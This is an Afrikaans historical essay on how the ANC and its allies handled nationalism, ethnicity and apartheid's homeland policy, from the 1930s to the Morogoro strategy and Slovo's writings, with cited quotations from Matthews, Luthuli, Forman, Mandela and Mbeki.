Tot en met die einde van die Tweede Wêreldoorlog het die leiers van die ANC ‘n onduidelike en versoenende toon gevoer t.o.v. die kwessie van nasionalisme; om die waarheid te sê t.o.v. allerlei kwessies.  Denkrigtings uit hul geledere het oorheersend die verlede en hede van Afrikane aangespreek sonder om te veel stil te staan by die uiteenlopendheid van volke wat die kulturele rykdom van die swart gemeenskap gevorm het.  John Henderson Soga, kleurling-akademikus en seun van Tiyo Soga – op sy beurt weer die land se eerste swart pastoor wat daarbenewens ook nog die vermetelheid gehad het om met ‘n Skotse dame te trou – het dit só voorgestel in sy groot kroniek oor die Nguni (J.H. Soga, 1930).

Intussen het die sterk opkoms van nasionalistiese Afrikanerkiesers (D. Harrison, 1981 en W.A. de Klerk, 1975) die ander groepe met dieselfde moontlike aspirasies in ‘n hoek gedwing wat die skepping van ‘n staat betref.  Ten eerste het die volgelinge van Barry Herzog, en later dié van Dr. Malan, van die Afrikaniste gedwing, waarvan etlikes ook blank was, om die antropologiese aannames wat hulle gemaak het, te hersien.  Die vraag  oor eenheid in die interetniese front van die Congress is egter nooit geopper nie en die paar nuwe organisasies het slegs binne die grense van kultureel homogene sones gefunksioneer (ICU Yase Natal, die Bantu Union en Convention in die Oos-Kaap, of die Bunga wat deur die regering in die Transkei geloods is).  Die provinsiale strukture binne die organisasie het onafhanklik gefunksioneer; in só ‘n mate dat daar sprake van afstigting was.  Die mees konserwatiewe persoonlikhede in die ANC (Selope, Theme, Champion en selfs Seme) het ‘n ekstremistiese Afrikanisme voorgestaan wat veelrassigheid en sosialisme vir die progressiewe vleuel minder aanloklik laat lyk het.

Die gesalfde helde van die Congress wat tydens die dertigerjare na vore getree het, het self ook nie aan teenstrydighede ontkom nie. Die erudiete rektor van die Universiteit van Fort Hare en neef van Plaatje, Prof. Z.K. Matthews, was ook van Tswana-afkoms maar beslis ‘n ondersteuner van unitarisme.  Hy kla in sy outobiografie:

“Ons leer om in twee wêrelde te leef…  Die een wat ons in werklikheid vir ewig wil afsweer (die stam), en die ander wat ons geen geleentheid bied om op enige ander manier te ontwikkel nie.  Ons sal nog later besef dat dit die proses van vervreemding van ons stamverbande was.”(Z.K. Matthews, 1983, p. 217)

Hierdie fenomeen waarna Matthews verwys geskied nie altyd onwetend nie.  Terwyl die gevolg van integrasie in ‘n multi- of a-etniese stedelike omgewing vanselfsprekend vervreemdend sou wees, was Matthews se stam egter besig om toenemend onder die invloed van bantoestanisering soos deur Pretoria afgedwing, te kom.  Die Zoeloe-hoofman, Albert Luthuli, beskryf hierdie konflik wat hy ook in eie wese ervaar, nog voordat hy hoofman en daarna president van die ANC sou word:

“Afrikane is vasgevang in ‘n ware dilemma – ons voel onsself daartoe genoop om ons lojaliteit aan ons stamhoofde te beaam terwyl ons sonder enige twyfel weet dat hulle besig is om in marionette van die Nasionaliste (Afrikaners) te verander” (A. Luthuli, 1989, p. 67).

Luthuli wy etlike fassinerende bladsye aan sy rol as hoof van die sendingstasie Umvoti en vertel hoedat ‘n klimaat van wedersydse hartlikheid en warmte tussen stedelike en plattelanse Afrikane geheers het in die dertigerjare.  Om die waarheid te sê, sý persoonlike trajek bewys in hoe ‘n mate die etniese projek van die Afrikaners aan die begin van die vyftigerjare met hul eie logika sou bots.  Dit sou aanleiding gee daartoe dat hy uiteindelik moes afstand doen van die Zoeloe-hiërargie en hom moes skaar by die toenemend anti-etniese ANC.  Luthuli, anders as sy SANNC voorgangers, slaag dus nie daarin om albei passies saam te snoer nie.  Hy maak ‘n keuse.  Ander weer, het kant gekies téén een groot nasie en vír die tuislande wat Verwoerd aangebied het.  Dit, volgens Luthuli, was die “groot lokval” (A. Luthuli, 1989, p. 178 – 184).

Maar ons wil dinge nie vooruitloop nie.  Die Congress van die dertiger- en veertigerjare het destyds nie gevoel hulle moet enigsins ‘n keuse uitoefen nie.  Soos Francis Meli ook onderstreep, het die organisasie konfrontasie met etniese groepe vermy.  Hulle het eerder gepolariseer wat eenheid t.o.v. die verlies van grondgebied, vryheid en die behoud van Afrikakultuur betref (F. Meli, 1988, p. 81).  Indien ‘n mens toegee dat ‘kultuur’ in werklikheid eintlik ‘kulture’ beteken, was dié standpunt inderdaad ‘n weloorwoë een:  dis eers aan die begin van die vyftigerjare en juis kort ná die oprigting van tuislande, dat kulturele doelwitte ten koste van die begeerte om eenheid laat vaar is.  Ander vriende, buite die ANC, was in elk geval onophoudelik besig om verskille uit te wys.

Nie baie martelaars sal ten aanskoue van dié oseaan van passie, ‘n derde weg voorstel nie. Een wat opposisie teen apartheid met die redelike erkenning van die pluraliteit van mense in Suid Afrika, in samehang aandui nie.  Weliswaar moet hulle nie vergete bly nie.  Lionel Forman was een onder hulle.  As jong kommunistiese intellektueel, het hy tydens die vyftigerjare met sy skerp prosa probeer om die Congress-alliansie te beïnvloed.  Dit was dáár waar die geagte marxiste, met die voordeel van ‘n demokratiese Congress en ander liggame, kon militeer.  Forman was een van die mees vrye geeste wat ooit in ‘n Stalinistiese opset aangetref sou word en sy teoretiese geskrifte was soos ‘n vars briesie.

Reeds in 1928 het die Komintern aan sy Suid-Afrikaanse filiaal opdrag gegee om die slagspreuk,  “’n Inheemse en Onafhanklike Republiek op die pad na ‘n Werkers- en Boererepubliek” aan te neem.  Tussen die tameletjie van die oproep self en die vrees van militante om die dreigement van vernietigende stalinistiese suiwering  – wat die oproep vergesel het – te trotseer, was daar maar min wat agteroor gaan sit het om die implikasies van die bewoording uit te pluis.  In 1932 weer, herhaal die Komintern hul aanslag:

“Onmiddelikke en volle nasionale onafhanklikheid vir alle volke in Suid Afrika.  Die reg van Zoeloes, Sothos, ens., om hul eie Republieke te vorm.  Die reg van Afrikanasies om vry ‘n Federasie van onafhanklike, inheemse Republieke te vorm en ‘n regering van werkers en boere te stig.  Beskerming vir die regte van minderhede, die werkende massas Indiërs, Kleurlinge en Blankes” (E. Roux, 1948, p. 256 ; Van Diepen, 1988, p. 143).

Dié aanwysings raak in die moeras van die Suid-Afrikaanse kommunistiese organisasie van die jare dertig verlore.

In 1954, in die tydskrif Advance, neem Forman, op eie houtjie, die risiko om die aanwysings weer te gaan opdiep en die debat aan die Congress-alliansie voor te lê.  Om mee te begin, vra hy dat die term “ras” vervang moet word met “nasionale groepe” of “volke” omdat dié benamings, selfs al dui dit op verskille, na sy mening die werklikheid van Suid Afrika beter weergee (L. Forman, 1992, p. 172).  En hy benadruk wat hy beskou as kultureel bevrydende eise, teenoor onderdrukkende rassestereotipes:

“Ons Zoeloedigters moet vryheidsliedere in hul moedertaal sing – mense moet uitbars van die lag as hulle Sotho-satires oor die regering aanhoor…  Suid Afrika is nie een nasie nie.  Dis ‘n multi-nasionale staat bestaande uit ‘n sekere aantal volkere” (L. Forman, 1992, p. 173-176).

Met sy griffel geslyp, laat Forman hom nie intimideer deur die buitensporige kritiek van Yusuf Dadoo van die Indian Congress nie – ook geaffilieer by die Alliansie – of deur lede van die ANC soos Z. K. Matthews se seun, Joseph, nie.  Joe betreur dit dat die debat ontydig kom in die lig van die opposisie se fundamentele eenheid. Dié sou later in elk geval die onsegbare doen en oorloop na Inkhata, om sy eer te verruil vir ‘n pot lensiesop!  Forman ignoreer die teenstand en voer die debat verder.  Hy wend hom tot kameraad Stalin vir kundige ondersteuning, met aanhalings oor sy idee van nasionaliteit en “nasionale groep”; dus ‘n entiteit met eie linguïstiese en historiese eienskappe wat aspireer na ‘n sekere territoriale en ekonomiese samehang.  Uit die volvoering van hierdie samehang word uiteindelik dan ‘n volwaardige nasie gebore.  Forman verwys na die identifikasie van volke in Suid Afrika en die skepping van ‘n oop, sosialistiese en gelukkige samelewing, maar benadruk in dié belangrike teks, die volgende:

“Om legitieme grondgebied aan mense te waarborg  sal ‘n paar oppervlakkige denkers, wat te veel gekondisioneer is om enige idee wat na verdeling lyk, met apartheid te assosieer, verbaas.  Maar dis duidelik dat waarborge oor nasionale outonomie in ‘n populêre demokrasie geheel en al niks met apartheid te doen het nie”(id., p. 188).

Forman druk deur en organiseer ‘n simposium in die Kaap oor die nasionale kwessie, waar hy optree saam met Masabalala Yengwa van die ANC, Archibald Jordan, ‘n Afrika-linguïs, en Jack Simmons van die sentrale komittee van die Kommunistiese Party (SACP). Jack Simons, in sy blindheid, oorreageer oor dié aangeleentheid, en laat geen polemiek daaroor ontwikkel nie.  Om die waarheid te sê, hy sensureer die gesprek:

“Dit sal ‘n fout wees om onsekerheid te skep of af te wyk… en om die klem op stam-, rasse- of kulturele verskille te plaas.  Daarom moet die klem, vir dié wat deelneem aan die nasionale bevrydingsbeweging, so veel as moontlik op gemeenskaplike waardes en belange geplaas word” (id., p. 188).

‘n Paar jaar later ontstaan daar verskille tussen, onder andere, Stalin en Potekhin, die direkteur van die Etnografiese Instituut in Moskou.  Toe Potekhin uitkom met die towerwoorde,  “…kennis van probleme verhoed foute” (id., p. 191) is Forman aangevuur om nie af te sien van die verbintenis tot sy idee nie.  Dit was trouens al wat dié dapper denker nodig gehad het om kop eerste by die skrum in te duik.  Hy argumenteer dat die distorsies op die nasionale kaart van Suid Afrika veroorsaak is deur kapitalisme en imperialisme wat weer aanleiding gegee het tot migrasies en hibride vorme van nasionaliteit in mynvestings en stede.  Hy voorspel die volgende:

“Een Afrikanasie sou miskien vóór een Suid-Afrikaanse nasie in Suid Afrika kon opstaan.  Eweneens lyk dit moontlik dat die Zoeloe-, Sotho- en ander volke onafhanklik sal ontwikkel  voordat hulle verdwyn in een Afrika nasie…  Met die Congress het die eerste werklike gevoel van ‘n nasionale Afrika-eenheid ontstaan.  Maar die afsonderlike stamme was lank reeds al as nasies beskou.  Die woord ‘nasie’ word vryelik gebruik om elke afsonderlike Afrikastam aan te dui op dieselfde manier as wat dit na Afrikane in hul geheel verwys.  Die gebruik van die woord “nasie’ is, in der waarheid, in beide gevalle verkeerd (id., p. 192 –194)

Hiervandaan verder begin ons ‘vriend’ die pad byster raak.  Hy gooi alle omsigtigheid van die verlede oorboord en begin pre-Afrikavolkere uitwys:  Zoeloe, Sotho, Xhosa, Swazi, Tswana, ens., asook ander pre-pre-Afrikavolkere wat nie rekening hou met kameraad Stalin se aanwysings oor geografiese samehang nie.  Afrikaners, Kleurlinge, Engelse, Indiërs (wat, na gelang van die linguïstieke maatstawwe wat gebruik word, miskien in twee groepe verdeel kan word).  Met ‘n vrygewige gebaar, ken hy aan almal, sosialisties en vry, die reg tot selfbeskikking toe.  Potekhin gooi olie op die vuur wanneer hy wed dat Engelse en Afrikaners as ras, en die Nguni-groepe linguïsties (Zoeloe, Xhosa en Swazi), sal saamsmelt.

Sodoende raak die debat in algemene teorie verlore, sonder die simpatie van selfs die partykamerade.  Forman, wat miskien sy stellinginname m.b.t. ‘n toekomstige Suid-Afrikaanse unie van sosialistiese republieke verder sou kon verfyn, sterf voortydig in 1959 en laat die Congress-alliansie ‘n bietjie wees wat teoretici oor die nasionale vraagstuk aanbetref.

Intussen is daar in die geledere van die ANC, sover dit die alledaagse praktyk aangaan, ‘n interessante ontwikkeling waarneembaar.  Sonder enige ophef, aanvaar die Congress van Dr. Xuma (1940 – 1949) deklarasies wat die lomp, nasionalistiese skerpheid van hul voorgangers ietwat temper.  In ‘n dokument waarin die Atlantiese Verdrag (1943) behandel word, getiteld African Demands, word die afsonderlike bestaan, soos voorsien deur die ou SANNC-struktuur, vir die drie protektorate geëis.  So ook, word soewereiniteit vir Suidwes-Afrika (Namibië) in ‘n ander dokument geëis.  Die reg tot selfbeskikking van volke word dus, wat Suid Afrika betref, bekragtig, maar nie genoegsaam geëkstrapoleer om vas te stel of dit een volk sonder etniese en rasse verskille behels, en of die volkere wat hul soewereiniteit moes uitoefen, as afsonderlik gesien is nie (Karis/Carter II, 1987, p. 213).  Xuma onderneem ook ‘n ambisieuse renovasie van die organisasie en plaas die provinsies direk onder sy bestuur, terwyl besluite aanstons deur die gesentraliseerde, permanente komittee geneem sou word.  Met die totstandkoming van die ANC Youth League (ANCYL), draai die debat rondom die punt wat Forman, dalk onskuldig, wou vermy: rasseverskille.  Dis onnodig om hier die toetrede van jong Afrikaniste tot die ANC se Congress òf die leerstellinge wat voorgelê is deur Lembede, Mda, Sisulu, ens., te ondersoek. ‘n Mens kan nietemin opmerk dat dié hegte groep wat rondom Afrikanisme vorm aangeneem het (“Afrikanisme moet bevorder word…  Afrikane moet opstaan vir hul nasionale bevryding”, id., p. 300),  het die oomblik toe sy program van aksie deur die ANC-bestuur aanvaar is, krake begin toon.  Die program was ten minste ewe eksplisiet as die dokumente van die ANC se jeugliga, waarin hulle sê:  “By nasionale bevryding bedoel ons bevryding van wit oorheersing en uiteindelik politieke onafhanklikheid” (id., p. 337).  Dié houding ten spyt, is daar verskeie persoonlikhede wat hulself op daardie oomblik tot veelrassige standpunte wend.  Aanvanklik was die behoudende of “nasionalistiese” vleuel (Mda, Ngubane, Tambo) oorskadu deur die eksklusiewe groep, of “Afrikaniste”(Lembede, Sisulu, Mandela en later Sobukwe).  Met die dood van Lembede in 1947 en die gesamentlike mobilisering van die Indian Congress en radikale wittes, asook die ontwikkeling van apartheid vanaf 1948, skaar die jong leeus van die League hulle by die minderheidsgroep.  Toe Xuma in 1949 onsetel word om plek te maak vir Walter Sisulu as sekretaris-generaal van die Congress, was rasse-nasionalisme alreeds beskou as byna ‘n jeugsonde, deur ‘n marginale groepie vuurvreters onderhou (P. Walsh, 1987, p. 49-361).  Dit was hierdie einste groepie, ondersteun en aangemoedig deur vurige retoriek, wat in 1959 sou wegbreek om die Pan Africanist Congress (PAC) onder leiding van Robert Sobukwe te stig.

Al wat nog makeer het was ‘n verklaring van die leerstelling wat dié nuwe veelrassige nasionalisme sou onderskryf.  Na ‘n paar jaar se samesprekinge was ‘n uitgebreide dokument aanvaar:  o.a. was daarin voorsiening gemaak vir die strewe na Swart, Wit en Grys volke.  Dit sou bekend staan as die Vryheidshandves (Freedom Charter).  In die voorwoord daarvan word dit as volg gestel:  “Suid Afrika behoort aan almal wat dit bewoon, Swart en Wit”(Karis/Charter III, 1987, p. 205).  Verwarring oor die besit van die nasionale erfdeel was hoegenaamd nie moontlik nie: alle rassegroepe moes deel daarin.  Met die aanvaarding van die beginsel van veelrassige samewerking, is die Congress-alliansie bekeer tot “Handvesalliansie”.   Om Suid Afrika in die voorwoord só as “volk” te definieer, was duidelik ‘n historiese mylpaal.

‘n Hoofstuk uit die Handves, het selfs gelyk asof dit moontlik Forman se teorie sou kon ondersteun; ten minste sover dit die pluralistiese ideologie van die eerste SANNC betref.  Só was daar van eenheid van die vaderland nêrens in ‘n enkele paragraaf melding gemaak nie; daar was nêrens eens sprake van ‘n model vir ‘n toekomstige nie-etniese of sentralistiese staat nie.  Met die sin:  “Alle nasionale groepe sal dieselfde regte hê” word aangekondig dat:

Alle nasionale en rassegroepe sal gelyke status hê in die Staatsdiens, voor die Reg en in die skole.  Alle nasionale groepe sal beskerm word deur die Wet in hul behoud van nasionale trots en teen rassediskriminasie; almal sal ‘n gelyke reg hê om hul eie taal te gebruik, hul eie populêre kultuur te ontwikkel asook hul eie gebruike” (Karis/Charter III, 1987, p. 205).

Bó en behalwe die gebruiklike verwarring tussen ras en nasionale groep, sou ‘n naïewe waarnemer kon sweer dat die Congress-alliansie ‘n “nasie van nasies”-projek probeer aanwakker.  Nie heeltemal nie.  Die Vryheidshandves het waarskynlik in dié paragraaf die swanesang van ‘n idee wat sy loop in ANC en medewerkerkringe geneem het, weergegee.  Een wat deur die bantoestanisering van Verwoerd, radikaal en binne ‘n baie kort tydjie, uitgewis sou word.  Die redakteurs van die Handves was ‘n ou generasie manne wat, soos Z.K. Matthews of Luthuli, hulself tussen twee wêrelde bevind het: ‘n stedelike, kultureel-hibriede een en ‘n plattelanse een gekenmerk deur etnisiteit en wat hulle, met nostalgie, aan hul gelukkige kinderdae herinner het.  Wat die wit marxiste, wat aan die redigeringsproses deelgeneem het, betref, het hulle sopas ontdek hoeveel verdeling en ophitsing in die uitdrukking “nasionale groepe” opgesluit lê.  Gou het hulle besef  dat dit ‘n faux pas was.

Die Morogoro-sindroom

Toe Hendrik Verwoerd in 1950 aangestel word as minister van Naturellesake, het hy dadelik begin om sy tesis van afsonderlike ontwikkeling of apartheid, toe te pas. Vir hom was Suid-Afrika ‘n wit land en daarom moes ander rassegroepe òf terugkeer na hul onderskeie bantoetuistes (tuislande) òf beskou word as tydlike immigrante in wit gebiede. Wetgewing wat in dié verband geneem is, het wette oor mobiliteit (1950 en latere wysigings in 1952), die Groepsgebiedewet (1950 en latere wysigings) en die Wet op Bantoe-owerhede (1951) behels. Die uiteindelike formulering daarvan het gekom met die afkondiging van die Wet op Bevordering van Bantoeselfbestuur (1959 en latere wysigings).

In hierdie verband moes die verslag, wat die regering aangevra het van die Tomlinsonkommissie, die objektiewe feite vir die vatbaarheid van territoriale segregasie inventariseer. Die gevolgtrekkings van die verslag wat in 1954 voorgelê is, ondersteun wat tot dusver niks minder as ‘n sinistêre teoretiese oefening van Verwoerd en sy volgelinge was nie. Dié werkstuk beveel die skepping van tien nuwe bantoestate wat die bestaande reservate as grondslag moes gebruik, aan. Dit moes gevolg word deur ‘n massiewe oordrag van investering en eienaarskap vir die territoriale konsolidasie daarvan. Die resultaat van só ‘n ambisieuse operasie sou die swart bevolking dan in staat stel om opgeneem te word daarin deur ekonomiese ontwikkelende maatreëls wat sou lei tot onafhanklikheid en emansipasie van die tuislande (Sachs, 1961), p.57).

Die regering was vinnig om net sekere voorstelle van die verslag te implementeer, terwyl die duurder voorstelle vir eers op die agtergrond geskuif is. As daar ooit enige twyfel daaroor bestaan het, was die perverse aard van apartheid as instrument vir wit oorheersing nou duidelik onderstreep, in teenstelling met werklike apartheid of retoriek wat gelyke afsonderlike ontwikkeling voorgestaan het (R. Malan, 1990, p. 31).

Nasionalistiese Afrikane was traag om hierop te reageer en om helder en besliste teenspraak te lewer. ANC-aktiviste het reeds van die begin af die beginsel en die absurditeit van afgeleë tuislande gekritiseer – Plaatje het, van meet af aan, hom daarteen verset in sy onafgebroke pleidooie téén wette oor eiendomsreg (S. Plaatje, 1916, p. 257-260). Teenstand teen die filosofie wat grondgebied afbaken, was niks nuuts nie. Maar daar was nogtans redelike twyfel, tot en met die wetsverklaring van 1959, of die waansin van Verwoerd wel eendag gestalte sou kry.

Met die besef dat die proses van bantoestanisering onomkeerbaar geraak het, het dié wat téén Pretoria se ‘lokval’ gekant was, hul stemme laat hoor. Een van die stemme, terwyl ‘n mens van die ANC praat, wat darem uitgesonder moet word, is dié van Nelson Mandela:

“Die tuislande probeer nie gestalte gee aan die aspirasies van die Afrikavolk nie: dit is instrumente van onderwerping. Onder die voorwendsel van outonomie, word dit [die hele land] verdeel in stameenhede wat vooruitgang en ontwikkeling tot nasionale status in die volle sin van die woord, vertraag” (Libération, 1959, p. 67 in : S. Johns et R. H. Davis, 1991).

Aanvanlik was Mandela veral bekommerd oor die moontlikheid dat die tuislande Afrikane se kapitaal kon toe-eien en ook oor die tendens na eksklusiwiteit en etnisiteit wat alomteenwoordig was – in die Suidafrikaanse samelewing sowel as binne die Congress self, selfs al was dit aan die afneem. Herinneringe aan sy jeug in Transkei was nog vars in sy geheue en hy het sonder twyfel ook dieselfde kontradiksies as Z.K. Matthews en Luthuli ervaar. Sy bande met die Xhosa-aristokrasie en sy spontane trou aan die verlede moes uiteraard aan hom ‘n kritiese register verleen. ‘n Paar jaar later, in die gevangenis, erken hy dat dié konflik by hom bestaan in ‘n brief aan sy biograaf, Fatima Meer. Hy beaam dat daar in sy eie gemoed twee Transkeie bestaan: die een wat onskuldig en oop is en hom herinner aan sy kinderdae en sy voorgangers, en die ander:

“…die politieke entiteit wat in die middel van die vyftigerjare die lig sien en wat die laagste soort polemiek laat opvlam het, sodat dit vriende, families en bewonderaars in teenstanders verander het, selfs in geswore vyande. Van sy neef, die president van Transkei, Kaiser Matanzima, sê hy: “Ons voel nog steeds baie ná aanmekaar, maar iets in my het gebreek toe hy na die Afrikanernasionaliste oorgeloop het” (F. Meer, 1990, p. XV).

Die burgeroorlog in Transkei wat grotendeels deur bantoestanisering veroorsaak is, het Mandela – en sy vrou Winnie – persoonlik geraak, want hul naastes was daarby betrokke (F. Meer, 1990, p. 152). Hierdie kontradiksie word uiteindelik opgelos, soos in byna elke geval binne die ANC, deur die satanisering van selfbeskikking soos Verwoerd dit voorstaan. Govan Mbeki beleef dit op eenderse wyse.

Die houding van laasgenoemde is van besondere belang. Van jongs af lid van die ANC en later van die SAKP, word hy later sekretaris van die Swart Kiesersvereeniging van die Transkei, en was hy ook vir vier jaar lank lid van die Bunga of stamraad. Ná sy skuldigbevinding by die Rivonia-verhoor, sou hy tydens sy gevangeneskap ‘n boek, The Peasants’ Revolt, skryf wat uiteindelik dié verwysing sou word onder die Xhosa-leierskap van die ANC. In sy oeuvre, gee Mbeki weer wat ‘n mens as die amptelike standpunt van die beweging oor die Transkei, sy burgerlike konflik en bantoestanisering in die algemeen, kan beskou:

Die Transkei is Dr. Verwoerd se antwoord op internasionale kritiek teen apartheid… Die Transkei is die venster op Suid Afrika… As apartheid nie dáár werk nie, sal dit nêrens werk nie. Dit is… ‘n wal om die vloed van Afrika-nasionalisme te keer in Suid Afrika. Die hele politiek van tuislande berus daarop dat wit oorheersing nie kan slaag om Afrika-nasionalisme te stuit indien hierdie nasionalisme nie deur sekere kanale beheer word nie. Die struktuur van apartheid, wat versigtig weggesteek word, bly swak en wankelrig. Ekonomiese werklikhede ontsier egter die drome van tuislande en, in plaas daarvan dat dit ‘n nasionale oplossing bied vir die probleme van vandag en more, is die tuislandprojek ‘n terugkeer na die Suidafrikaanse verlede” (G. Mbeki, 1964, p. 15 – 22).

Mbeki belig die uiters belangrike verskil tussen die Transkei vóór en ná apartheid. Eersgenoemde was nou wel die resultaat van volwaardige segregasie en die belofte van privaatbesit in ‘n reservaat vir Afrikane wat hul reg daartoe in wit gebiede verbeur het, maar hulle het nie alle regte van Suidafrikaanse burgerskap as tuislandinwoners verbeur nie. Die soewereine model wat vir die hele Unie gegeld het, is ook nie aangetas nie. Die Bunga-verkiesings was nie as alternatiewe verkiesings vir dié in Suid Afrika voorgehou nie – vir die enkele paar kiesers in die Transkei wat stemreg gehad het. Ná die wet van 1959 en sy latere wysigings, was die neiging van Pretoria egter om die regte en voorregte van wit Suid Afrika van die tuisland en sy burgers te weerhou.

‘n Ander kritiek soos deur Mbeki verwoord, weliswaar meer bykomstig as konseptueel, beklemtoon nogtans die feit dat die uitgebreide aanwysings van die Tomlinsonverslag nie deurgevoer is nie. Die fiasko van die tuislande word rugbaar toe die demografies reeds-versadigde grondgebiede voorgehou word as teenvoeters vir die migrasie-tendens sonder dat daar intussen enige landbou-ontwikkeling plaasvind òf die skepping van‘n plaaslike middelklas aangemoedig word. Volgens Mbeki, was die vlak van investering aan die begin van die sestigerjare minder as die helfte van wat die Tomlinsonverslag aanbeveel het as absolute minimum nodig om aangewese doelwitte te bereik (G. Mbeki, 1964, p. 94).

In 1970, met die Wet op Bantoeburgerregte, word die opheffing van dubbele burgerskap uiteindelik aangekondig en met onafhanklikheidswording van tuislande sou dit outomaties van krag word. Die Eerste Minister, Verwoerd, het sy huiwering uitgespreek oor die verbrokkeling van sy nuwe Republiek (in 1961 uitgeroep, ná uittrede uit die Commonwealth). Sommige ANC-aktiviste, gevangenes of uitgewekenes, het die raaiselagtige sluipmoord op die Eerste Minister in 1966, beskou as die resultaat van binnegevegte. Vir hulle was dit die werk van sekere groeperinge in die regerende party self wat Verwoerd se teenkanting wou oorkom en wat bantoestanisering nougeset wou toepas (M. Dingake, 1987, p. 197).

Die eerste onafhanklikheidswording, dié van die Transkei, sou nie vóór 1976 geoktrooieer word nie. Dit was egter lank reeds duidelik dat nie God òf Dr.Verwoerd ‘n konsessie met ‘n perk van aanvanklik-net-‘n-bietjie outonomie sou kon instel nie. Die bal, van die hoogste krans van apartheid af, was aan die rol en was besig om momentum op te tel. In ANC-geledere, veral in die buitelandse missie, was die antwoord daarop weereens die gewone afkeur aan die ‘piesangrepublieke’ in ‘n poging om dit te diskrediteer, binne sowel as buite Suid-Afrika. Die veldtog was ‘n sukses, want die internasionale gemeenskap wou geeneen van die ‘onafhanklike state’ erken nie.

Binne die Congress was kategoriese verwerping die mees algemene reaksie:

Tuislande is ‘n verbygaande verskynsel, ‘n nagmerrie op die pad na vryheid waaraan ons mense nog sal terugdink. Een ding is egter seker: Afrikane sal nooit Bantoe-owerhede aanvaar as alternatief vir vryheid en demokrasie in Suid-Afrika nie.”

Só praat Masabalala Yengwa, wat skaars vyftien jaar terug nog met Lionel Forman wou gesels oor die belangrikheid van nasies in Suid-Afrika (A. La Guma, 1972, p. 19).

Tesame met al dié verdoemende uitlatings, was die mees gesiene intellektuele in die Handvesalliansie aan die werk om ‘n gesofistikeerde en komplekse korpus van teorieë te probeer ontwikkel sodat die historiese moment waarin die ‘nasie’ sig bevind het, beskryf kon word en hulle raad kon bedink wat al sy kwale sou genees. Die towerstaf verskyn in die hand van Joe Slovo en ander invloedryke kommuniste met die dokument getiteld Strategie en Taktiek, by die Morogoro-konferensie (1969).

Met verwysing na die Vryheidshandves, maak dié nuwe dokument vir die eerste maal die deur oop vir militantisme binne die ANC – vir die oomblik uitgeweke – wat alle rassegroepe sou betrek. Aanvanklik het dit eers op die agtergrond gebly. Die eens nasionale, veelrassige doktrine sou egter laat vaar word om, in 1983, vervang te word deur ‘n nie-rassige begrip wat uitgebrei sou word na die bestuur en ondergrondse militante in die ANC se binnelandse vleuel. Strategie en Taktiek het die Suidafrikaanse situasie as ‘n “spesiale soort kolonialisme” beskryf omdat veronderstel is dat imperialiste en gekoloniseerdes besig was om dieselfde grondgebied te betwis. Die ANC sou daarom die stryd téén kolonialisme namens die onderdrukte klasse moes voer – wat hoofsaaklik swart was, met die uitsondering van enkele ‘albino’ rebelle – om één nasie te bou, saamgesnoer in ‘n samelewing sonder klasseverskille en waar rasse-, etniese-, geslags-, ens. diskriminasie nie teenwoordig was nie.

Slovo het homself onderskei as ‘n meedoënlose stryder op vele gebiede en veral wat die uitbreiding en verspreiding van die Morogoro-tesis betref. Hy benadruk daar ‘n spesifieke soort kolonialisme in Suid Afrika bestaan waar klein afhanklike entiteite regeer word deur plaaslike oligargieë – die tuislande – op dieselfde wyse as wat daar vanuit koloniale metropole voortgegaan word om hul eertydse besittings te plunder (B. Davidson, J. Slovo en A.R. Wilkinson, 1976, p. 144).

Slovo se tydbom gaan in 1988 af met die verskyning van ‘n versameling o.l.v. Maria Van Diepen, getiteld Die Nasionale Vraagstuk in Suid Afrika. Daarin ondersoek en verbreed ‘n groep intellektuele ná aan die ANC die stellings in Strategie en Taktiek in al sy nuanses. Slovo self, bring ook sy deel in die vorm van ‘n artikel waarin ‘n sleutelvraag beantwoord word: “Is ons reeds ‘n nasie of vir die oomblik nog net ‘n nasie-in-wording?” Daarin weerlê hy die stalinistiese stelling oor nasionaliteite en die teorieë van Forman. Volgens hom laat Forman die debat byna struikel deurdat hy dit te naby aan etniese separatisme waag en beklemtoon Slovo dat etniese en streeksvraagstukke oor regte gereeld die anti-koloniale stryd om ware nasionale selfbeskikking ondermyn i.p.v. ondersteun. Hy kondig aan:

Suid Afrika is nie ‘n veelrassige land nie: dis ‘n nasie-in-wording… Ons weet baie goed wat ‘veelvolkery’ beteken. Dis ‘n uitgeslape manier om nasionale heerskappy te behou… Ons kan geen uitgebreide of berekende voorstelle aanvaar wat ‘n ‘veelvolkige’ raamwerk in stand hou en wat ‘n verbrokkelde nasionale identiteit en daarmee saam wit rassisme, beskerm nie” M. Van Diepen, 1988, p. 148).

In dieselfde trant verontagsaam die outeur die toegewyde aanbevelings van kameraad Starushenko, lid van die Sowjet Akademie vir Wetenskap, wanneer dit oor minderheidsregte in die toekomstige Suid Afrika gaan:

In die Sowjet Unie, is die erkenning van veelvolkery die basis vir bevryding en nasionale selfbeskikking… In ons geval is veelvolkery die by uitstek die rassistiese manier om nasionale dominansie te verseker” (id., p. 150)

Die versameling in sy geheel verleen ‘n interessante nuanse aan die sentralistiese gedagte wat Slovo verdedig. M. Van Diepen dring byvoorbeeld daarop aan dat wit nasionalisme ‘n bedekte vorm van dominansie is, terwyl ware, bevrydende en nie-rassige nasionalisme in ‘n swart nasie vervat is – wat ook staatmaak op sekere minderhede (id., p. 10). William Pomeroy gaan aanvanklik van dieselfde standpunt uit, maar verloor sy draad deurdat hy ‘n model soortgelyk aan dié van die Sowjet Unie wil voorstel om die etniese doolhof, uit kolonialisme oorgeërf, die hoof te bied. In sy gevolgtrekking egter, vind hy sy spoor terug en wys daarop dat ‘n enkele internasionalistiese en oop mag – soos byvoorbeeld die ANC – oor die kapasiteit van integrasie beskik om dié taak baas te raak (id., p. 14 – 29).

Mzala, ‘n suiwer Zoeloe en die ANC se skerpste assegaai teen Buthelezi, meen dat kapitalisme in Suid Afrika ‘n samehang meebring vanweë ‘n gemeenskaplike mark wat verskille tussen Afrikane laat vervaag. In dié verband is die mees effektiewe verweer teen die volkse, wit onderdrukking ‘n nasionalistiese solidariteit van die onderdruktes. Die werkersklas, kwansuis bevry van enige etniese bande, vorm sodoende die avant-garde van ‘n rewolusie wat sal lei na ‘n nuwe sosialistiese volk en wat – volgens hom – volke wat alreeds nie eintlik meer afsonderlik is nie, sal saambind. Dit raak nog meer ongemaklik wanneer die skrywer, sonder skroom, sy tesis belig met voorbeelde van samesmelting uit ander ervarings in die geskiedenis: “Die Italiaanse volk is tog gevorm deur die Romeine, Teutone, Etruskers, Grieke, Arabiere, ens.” (id., p. 39 – 55)

